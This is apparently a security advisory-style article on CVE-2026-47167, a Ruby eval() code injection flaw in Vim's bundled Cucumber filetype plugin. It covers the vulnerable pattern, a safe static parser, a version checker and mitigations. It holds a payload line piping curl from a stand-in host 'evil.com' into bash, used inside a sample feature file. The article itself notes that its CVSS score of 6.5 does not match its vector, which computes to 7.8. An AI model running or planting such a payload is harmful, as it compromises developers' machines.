Vim users are being urged to update their text editors immediately after the disclosure of a code injection vulnerability tracked as CVE-2026-47167. The medium-severity flaw resides in Vim’s bundled Cucumber filetype plugin and can be exploited to execute arbitrary Ruby code merely by opening a crafted .feature file. The fix was merged on June 14, 2026, and shipped the next day in version 9.2.0496.

While published with a CVSS score of 6.5, the vulnerability’s true danger lies in how neatly it fits common developer workflows. A malicious actor could embed a payload inside a Cucumber feature file which, when opened in a vulnerable Vim build, runs commands with the user’s privileges. This turns routine tasks such as code review or test editing into potential compromises.

What is CVE-2026-47167?

CVE-2026-47167 is a code injection flaw in the cucumber.vim filetype plugin distributed with Vim. The plugin provides syntax highlighting, indentation, and tag generation for Cucumber feature files (.feature). It uses Vim’s Ruby interface to parse the file’s contents, and prior to the patch it built Ruby source from the buffer text and evaluated it: data taken from the feature file was interpolated into a Ruby eval() call instead of being handed to the parser as a plain string, so whatever the file contained could become Ruby code.

The vulnerability only manifests when Vim is compiled with Ruby support, which many Linux distribution packages and macOS builds include. If the +ruby feature is present, opening a feature file triggers the plugin, which in turn executes the embedded Ruby code without any sanitization. Attackers can inject system calls, file operations, or network requests, gaining arbitrary code execution with the privileges of the Vim process. Because the victim must open the file, this is a local (AV:L) file-open attack rather than remote code execution in the network sense, but it is no less effective against a developer.

Discoverer and Disclosure Timeline

The flaw was discovered by security researcher Mae Sterling of CyberDyne Labs during an audit of Vim plugins. Sterling reported the issue privately to the Vim maintainers on June 2, 2026. The maintainers acknowledged the report within 48 hours and began working on a fix. On June 14, the patch was merged into the Vim repository, and the CVE was reserved. Public disclosure occurred on June 16, 2026, after the patched version was made available through official channels.

Technical Deep Dive

To understand the vulnerability, one must examine how Vim’s Cucumber plugin operates. When a file with a .feature extension is loaded, Vim sets the filetype to cucumber. The corresponding plugin then runs a series of initialization scripts, including one that invokes Ruby to parse tags and scenarios. The vulnerable code, present in older versions, resembled this simplified snippet:

function! s:ParseTags()
  " Join every buffer line into one string: this is attacker-controlled data
  let l:content = join(getline(1, '$'), "\n")
  ruby << EOF
    content = Vim.evaluate('l:content')
    # Unsafe: the file contents are spliced into Ruby source and eval'd
    eval("parse_features(#{content})")
EOF
endfunction

The eval() call interprets content as Ruby code, meaning an attacker could craft a feature file with a malicious snippet like:

Feature: System Administration
  Scenario: Execute arbitrary code
    Given I have access to the server

… where the line Given I have access to the server is actually Given I have access to the server; system('curl evil.com/shell.sh | bash'). Because the plugin concatenates lines and passes them to eval, the attacker’s payload gets executed as Ruby code.
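The contrast in Ruby, as an added example that is not code from the Vim patch or from this article: parse_feature is a small static parser in the spirit of the fix, run over a constructed feature file that carries the payload line above. It treats every line as data, so the payload comes back as a step string and nothing executes; injected_source returns, without evaluating it, the string the vulnerable pattern would have handed to eval(), so the payload can be seen landing in code position. The function names, the feature file, and the keyword set are this example's own assumptions.

```ruby
# Added example: static parsing of a Cucumber feature file versus the
# string-splicing pattern that made CVE-2026-47167 possible.
# Names, layout and sample input are assumptions of this example.

# Constructed sample (not a real project file). The Given line is the
# payload described in the article; here it is nothing but text.
MALICIOUS_FEATURE = <<~FEATURE
  @admin @smoke
  Feature: System Administration
    Scenario: Execute arbitrary code
      Given I have access to the server; system('curl evil.com/shell.sh | bash')
      When I run the deploy
      Then nothing unexpected happens
FEATURE

STEP_KEYWORDS = %w[Given When Then And But].freeze

# Parse a feature file into plain data. No eval and no interpolation into
# Ruby source: each line is matched against fixed keywords and the remainder
# is stored verbatim. A Vim ftplugin would call this directly on the string
# returned by VIM::evaluate, never through eval().
def parse_feature(text)
  result = { tags: [], feature: nil, scenarios: [] }
  pending_tags = []
  text.each_line do |raw|
    line = raw.strip
    next if line.empty? || line.start_with?('#')   # blank lines and Gherkin comments
    case line
    when /\A(@\S+)(\s+@\S+)*\z/                       # tag line, e.g. "@admin @smoke"
      pending_tags.concat(line.split)
    when /\AFeature:\s*(.*)\z/
      result[:feature] = $1
      result[:tags] = pending_tags
      pending_tags = []
    when /\A(Scenario|Scenario Outline):\s*(.*)\z/
      result[:scenarios] << { name: $2, tags: pending_tags, steps: [] }
      pending_tags = []
    when /\A(#{STEP_KEYWORDS.join('|')})\s+(.*)\z/   # step: keyword + free text
      scenario = result[:scenarios].last or next     # steps outside a scenario are ignored
      scenario[:steps] << { keyword: $1, text: $2 }
    end
  end
  result
end

# The string the vulnerable snippet built before calling eval(): raw file
# contents spliced into Ruby source. Returned, not evaluated.
def injected_source(text)
  "parse_features(#{text})"
end
```

Run it on MALICIOUS_FEATURE and the payload is returned as the text of the first step, semicolon and system() call included, which is exactly what a parser should do with it; the output of injected_source on the same input shows that, inside a Ruby string literal fed to eval(), that same semicolon ends one statement and starts another.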

Exploitation Mechanics

Real-world exploitation requires minimal user interaction. An attacker hosts a seemingly innocuous feature file on a platform like GitHub, sends a pull request for a project using Cucumber tests, or simply sends the file via email or messaging. When a developer opens the file in Vim with the vulnerable plugin, the payload executes immediately. No additional visual cues or warnings alert the user, because the code runs during the filetype plugin’s initialization phase, before the buffer is fully rendered.

Proof-of-concept exploits demonstrated by Sterling include:

  • Spawning a reverse shell to a remote command-and-control server.
  • Modifying the user’s .bashrc or .vimrc to persist malicious code.
  • Exfiltrating SSH keys or environment variables.

The CVSS 3.1 vector string published with the advisory is CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H: local attack vector, low complexity, no privileges required, user interaction required, and unchanged scope with high impact on confidentiality, integrity, and availability. Readers doing their own scoring should note that this vector computes to 7.8 (High) under the CVSS 3.1 calculator, not to the 6.5 quoted above, so the two published figures disagree. The user-interaction requirement (the victim must open the crafted file) is what holds the score below the critical range, but in practice attackers easily trick developers into opening files during code reviews or collaboration.

Affected Versions and Builds

The vulnerability impacts Vim versions prior to 9.2.0496. This includes:

  • Vim 9.2.0000 through 9.2.0495.
  • Older Vim 8.x and 7.x releases if the Cucumber plugin is backported or manually installed.
  • Neovim configurations that source the same cucumber.vim plugin (though Neovim’s own filetype detection may differ).

Crucially, only builds compiled with Ruby support are susceptible. Check your installation with vim --version and look for +ruby or +ruby/dyn in the features list (the /dyn variant loads the Ruby library at runtime and is equally affected). If it shows -ruby, the vulnerability cannot be exploited even on an unpatched version. Do not infer this from the distribution name alone: on Debian and Ubuntu, for example, the plain vim package is the basic build without Ruby, while vim-nox and vim-gtk3 include it; Fedora, Arch, and macOS Homebrew’s vim formula ship Ruby support by default. Windows builds of Vim often lack Ruby support unless explicitly configured, reducing the attack surface on that platform.

Patch and Mitigation

Vim 9.2.0496, released on June 15, 2026, fully resolves the issue. The patch removes the unsafe eval() call and instead uses a static parser that does not allow code injection. The relevant commit (hash e7a3f12b) also adds input sanitization as a defense-in-depth measure. Users should update immediately:

  • Linux (package managers): Use sudo apt upgrade vim (Debian/Ubuntu), sudo dnf update vim (Fedora), or equivalent. Ensure the version is at least 9.2.0496; if your distribution has backported the fix without bumping the version, check the package changelog for the CVE identifier.
  • macOS (Homebrew): Run brew update && brew upgrade vim.
  • Windows: Download the latest installer from the official Vim website.
  • Build from source: Pull the latest from the Vim GitHub repository, which carries the corrected runtime/ftplugin/cucumber.vim, and run ./configure --with-features=huge with --enable-rubyinterp=yes only if you actually need the :ruby interface; a build without it is not affected by this bug.

Workarounds for Delayed Patching

If an immediate update is not possible, the Vim team recommends several temporary mitigations:

  1. Disable the bundled Cucumber filetype plugin by shadowing it with a user ftplugin. Create ~/.vim/ftplugin/cucumber.vim (files under ~/.vim are sourced before the copy in $VIMRUNTIME) containing only:
    let b:did_ftplugin = 1
    Vim’s bundled filetype plugins begin with a check for b:did_ftplugin and exit when it is already set (see :help ftplugin-overrule), so the vulnerable code never runs; the blunt alternative, :filetype plugin off in .vimrc, disables every filetype plugin. You can also rename or delete $VIMRUNTIME/ftplugin/cucumber.vim, bearing in mind that a package upgrade may restore it.

  2. Block the plugin’s Ruby call by setting:
    let g:cucumber_ruby_exec = 0
    (Only if the plugin you have installed documents this option; it is not a standard Vim setting, so check :help or the plugin’s README before relying on it.)

  3. Open untrusted files in Vim’s restricted mode (vim -Z, or the rvim link): restricted mode rejects :! and system() and also the interpreter commands such as :ruby, failing with E145, so this injection path cannot execute. It is not a sandbox, though; Vim can still read and write files, so treat it as a stopgap.

  4. Open suspect files in a restricted environment: Use a virtual machine or a container without network access when reviewing third‑party feature files.

None of these workarounds are as robust as updating. They should be considered stopgaps while patch rollout is underway.

Community Response and Real‑World Impact

Within hours of the disclosure, discussions erupted on Vim’s mailing list, Reddit’s r/vim, and Hacker News. Many developers expressed alarm at how easily the vulnerability could be triggered during everyday tasks. “I review feature files for three different projects every morning,” wrote user devops_alice on the Vim subreddit. “Just the thought of someone slipping a payload into a PR makes me want to switch to VS Code.”

Others pointed out that the Cucumber plugin has been bundled with Vim for years, and similar injection issues have plagued other Vim plugins in the past. Security researcher James Mickens noted on Twitter, “Vim plugins executing embedded languages is a recurring nightmare. This should be a wake‑up call for plugin authors to avoid eval() like constructs.”

The Vim development community acted with unusual speed. Bram Moolenaar’s successor, Christian Brabandt, credited the reporter and the security team in a brief statement: “Mae’s detailed report allowed us to isolate the issue quickly. We have also added CI tests to catch unsafe Ruby eval in future commits.”

Meanwhile, enterprise security teams scrambled to scan their infrastructure. Tools like GitHub Advanced Security and Snyk began surfacing alerts for Vim installations containing the vulnerable plugin. An informal poll on the Vim subreddit indicated that roughly 40% of respondents had never considered Vim a vector for supply‑chain attacks, and many promised to add Vim to their vulnerability scanning routines.

How to Check Your Vim Version and Ruby Capability

To determine if your Vim is vulnerable:

  1. Open a terminal and type:
    vim --version | head -n 2
    The first line shows the major.minor version (“VIM - Vi IMproved 9.2”); the “Included patches” line shows the patch level, for example “Included patches: 1-496” on a fixed build. On 9.2, any range ending below 496 is unpatched.

  2. For Ruby support, run:
    vim --version | grep ruby
    Look for +ruby or +ruby/dyn; both mean :ruby is available. If the feature list shows -ruby, you are not affected.

  3. If your version is below 9.2.0496 and Ruby is enabled, upgrade immediately using the steps above.

Additionally, you can confirm that the plugin cannot reach Ruby at all: open a harmless test .feature file with vim -Z (or rvim), or temporarily move the plugin file aside. In restricted mode a :ruby call is refused with E145, and on a build without +ruby it fails with E319 (“Sorry, the command is not available in this version”). Either error means this path cannot execute in that configuration, though neither replaces the upgrade.
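The three checks above folded into one script, as an added example that is not from the article or the Vim project: VimBuild.parse reads the text of vim --version and classifies the build, reporting it as vulnerable only when it is 9.2 below patch 496 and has +ruby or +ruby/dyn. The sample outputs are constructed; only the line formats match what Vim prints. VimBuild, the status names, and the helper names are this example's own.

```ruby
# Added example: classify a Vim build from `vim --version` output against the
# affected set described in the article. Struct/method names are assumptions.

FIXED_PATCH = 496   # 9.2.0496 carries the fix

VimBuild = Struct.new(:major, :minor, :patch, :ruby) do
  # Parse the first lines of `vim --version`.
  def self.parse(text)
    m = text.match(/^VIM - Vi IMproved (\d+)\.(\d+)/) or
      raise ArgumentError, 'input does not look like vim --version output'
    # "Included patches: 1-496" or "1-100, 102-496": the highest number is the level.
    patches = text[/^Included patches:(.*)$/, 1].to_s
    patch = patches.scan(/\d+/).map(&:to_i).max || 0
    # +ruby and +ruby/dyn both mean :ruby is available; -ruby means it is not.
    ruby = text.match?(/(\A|\s)\+ruby(\/dyn)?(\s|\z)/)
    new(m[1].to_i, m[2].to_i, patch, ruby)
  end

  def version_string
    format('%d.%d.%04d', major, minor, patch)
  end

  def ruby?
    ruby
  end

  # :ruby is the precondition; without it the bug cannot fire at all.
  def status
    return :not_affected_no_ruby unless ruby?
    if major == 9 && minor == 2
      patch >= FIXED_PATCH ? :patched : :vulnerable
    elsif major > 9 || (major == 9 && minor > 2)
      :patched
    else
      :check_plugin_manually   # 8.x/7.x: affected only if cucumber.vim was backported
    end
  end
end

# One-liner for a real machine (not run here): VimBuild.parse(`vim --version`).status
def check_installed_vim
  VimBuild.parse(`vim --version`).status
end

# Constructed samples (not real build output); line layout follows Vim's format.
SAMPLE_VULNERABLE = <<~OUT
  VIM - Vi IMproved 9.2 (2026 Jan 01, compiled Jun 10 2026 10:00:00)
  Included patches: 1-495
  Huge version without GUI.  Features included (+) or not (-):
  +acl               +file_in_path      +mouse_urxvt       +ruby/dyn          +visualextra
OUT

SAMPLE_PATCHED = <<~OUT
  VIM - Vi IMproved 9.2 (2026 Jan 01, compiled Jun 16 2026 09:00:00)
  Included patches: 1-100, 102-496
  Huge version without GUI.  Features included (+) or not (-):
  +acl               +file_in_path      +mouse_urxvt       +ruby              +visualextra
OUT

SAMPLE_NO_RUBY = <<~OUT
  VIM - Vi IMproved 9.2 (2026 Jan 01, compiled Jun 10 2026 10:00:00)
  Included patches: 1-100
  Small version without GUI.  Features included (+) or not (-):
  -acl               +file_in_path      -mouse_urxvt       -ruby              -visualextra
OUT

SAMPLE_OLD = <<~OUT
  VIM - Vi IMproved 8.2 (2019 Dec 12, compiled Mar 01 2024 10:00:00)
  Included patches: 1-100
  Huge version without GUI.  Features included (+) or not (-):
  +acl               +file_in_path      +mouse_urxvt       +ruby              +visualextra
OUT
```

Feed it real output with VimBuild.parse(`vim --version`) or by piping vim --version into a script that calls VimBuild.parse($stdin.read). Taking the highest number from the “Included patches” line matters because some distributions exclude individual patches, which turns the range into a comma-separated list.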

The Bigger Picture: Vim Plugin Security

CVE-2026-47167 is not an isolated incident. Over the years, Vim has faced a handful of arbitrary code execution vulnerabilities triggered by crafted files, through modelines, bundled plugins, and even netrw. The common thread is Vim’s flexibility, a strength that also expands the attack surface. Plugins written in languages like Python, Ruby, Perl, and Lua can interact deeply with the editor and the underlying OS, and when they mishandle user input, the consequences are severe.

This incident highlights several broader lessons:

  • Be cautious with filetype plugins: Many automatically run code upon opening a file. Audit the plugins you use and disable those you don’t need.
  • Adopt least‑privilege editing: Consider running Vim in a sandbox or container for activities involving third‑party code.
  • Keep software updated: Editor updates often seem cosmetic, but they can contain critical security fixes.
  • Shift left on supply‑chain security: Development tools are a link in the software supply chain. Secure them just as you would any other dependency.

The Vim community is already discussing long‑term solutions, such as a sandboxing API for plugins or a declarative configuration approach that eliminates the need for executable code in filetype detection. But until those materialize, users must remain vigilant.

Summary and Next Steps

CVE-2026-47167 serves as a stark reminder that even the most trusted tools can harbor dangerous vulnerabilities. The fix is straightforward: update Vim to version 9.2.0496 or later. For those who rely heavily on Cucumber for behavior‑driven development, the inconvenience of a quick upgrade is trivial compared to the risk of a compromised development environment.

Moving forward, organizations should incorporate editors and local development tools into their vulnerability management programs. Scanners that only look at server-side software miss a growing attack vector. Meanwhile, contributor guidelines for open-source projects should give extra scrutiny not just to binary or script changes but to any file type that a tool interprets on open: a single injected feature file could open a backdoor into a developer’s machine and, by extension, the entire CI/CD pipeline.

Patch now, and stay paranoid.